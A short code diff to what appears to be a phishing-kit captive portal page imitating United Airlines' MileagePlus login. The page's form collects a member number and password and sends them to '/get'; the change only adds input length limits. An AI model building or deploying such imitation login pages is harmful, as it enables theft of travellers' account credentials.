--- a/portals/airlines/united_airline.html
+++ b/portals/airlines/united_airline.html
@@ -99,11 +99,11 @@ body {
 <form action="/get" id="email-form-step" method="GET">
 
 <div class="form-group">
-<input class="input-field" name="email" type="text" placeholder="MileagePlus® number" required>
+<input class="input-field" name="email" type="text" placeholder="MileagePlus® number" maxlength="100" required>
 </div>
 
 <div class="form-group">
-<input class="input-field" name="password" type="password" placeholder="Password" required>
+<input class="input-field" name="password" type="password" placeholder="Password" maxlength="100" required>
 </div>
 
 <div class="form-group">
